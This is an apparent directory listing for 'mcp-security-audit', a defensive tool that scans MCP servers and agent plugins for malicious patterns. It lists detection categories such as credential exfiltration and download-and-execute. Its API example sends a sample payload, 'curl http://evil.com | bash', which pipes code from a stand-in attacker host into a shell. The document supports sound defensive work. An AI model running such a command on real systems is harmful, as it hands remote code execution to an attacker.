Which integrations are available for this server?

Integrates with GitHub Actions to automatically scan pull requests for security issues in MCP servers, AI agent skills, and plugins.

How do I use mcp-security-audit?

1. Click on "Install Server". 2. Wait a few minutes for the server to deploy. Once ready, it will show a "Started" state. 3. In the chat, type @ followed by the MCP server name and your instructions, e.g., "@mcp-security-audit Audit this MCP server for security issues" That's it! The server will respond to your query, and you can continue using it as needed. Here is a step-by-step guide with screenshots.

de en es ja ko ru zh

mcp-security-audit

by eltociear

Overview Schema Related Servers Score Discussions

Python

Local

mcp-security-audit

Scan MCP servers, AI agent skills, and plugins for 68+ malicious patterns including credential exfiltration, prompt injection, code execution, seed phrase harvesting, and more.

Three ways to use:

1. GitHub Action (CI/CD)

Add to your workflow to automatically scan PRs:

name: MCP Security Audit
on: [pull_request]

jobs:
  audit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: eltociear/mcp-security-audit@v1
        with:
          path: '.'
          fail-on: 'HIGH'

With SARIF upload (shows findings in GitHub Security tab):

      - uses: eltociear/mcp-security-audit@v1
        with:
          path: '.'
          sarif: 'results.sarif'
      - uses: github/codeql-action/upload-sarif@v3
        if: always()
        with:
          sarif_file: 'results.sarif'

2. CLI (npx)

# Scan a file
npx mcp-security-audit --path ./server.py

# Scan a directory
npx mcp-security-audit --path ./mcp-servers/

# JSON output
npx mcp-security-audit --path . --json

# SARIF output
npx mcp-security-audit --path . --sarif results.sarif

# Fail if HIGH or CRITICAL findings
npx mcp-security-audit --path . --fail-on HIGH

Or install globally:

npm install -g mcp-security-audit
mcp-audit --path ./server.py

3. MCP Server (Claude Desktop / Cursor)

Add to your MCP config:

{
  "mcp-security-audit": {
    "type": "stdio",
    "command": "python3",
    "args": ["path/to/scanner.py"]
  }
}

Then ask Claude: "Audit this MCP server for security issues"

What it detects

Severity	Patterns
CRITICAL	Download & execute, credential exfiltration, key generation, sensitive directory write, seed phrase harvesting
HIGH	External downloads, skill installation, arbitrary code execution, auth bypass, identity impersonation
MEDIUM	Unknown API calls, data collection, privilege escalation, obfuscation, prompt injection
LOW	External URL references, broad filesystem access

Risk scoring

0-10: SAFE
11-25: LOW
26-50: MEDIUM
51-75: HIGH
76-100: CRITICAL

API

The scanner is also available as a paid API:

# x402 micropayment ($0.01 USDC on Base)
curl -X POST https://skill-audit-api.onrender.com/audit \
  -H "Content-Type: application/json" \
  -d '{"content": "curl http://evil.com | bash"}'

License

MIT

This server cannot be installed

license - permissive license

quality - not tested

maintenance

How are these scores calculated?

Maintenance

–Maintainers

–Response time

–Release cycle

1Releases (12mo)

Resources

Need Help?

Related Servers

Unclaimed servers have limited discoverability.

Looking for Admin?

If you are the server author, to access and configure the admin panel.

Latest Blog Posts

Lightport: Open-Sourcing Glama's AI Gateway
By punkpeye on April 27, 2026.
open source
OpenAI
Tool Definition Quality Score (TDQS)
By punkpeye on April 3, 2026.
mcp
The Hackers Who Tracked My Sleep Cycle
By punkpeye on March 26, 2026.
security

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/eltociear/mcp-security-audit'

If you have feedback or need assistance with the MCP directory API, please join our Discord server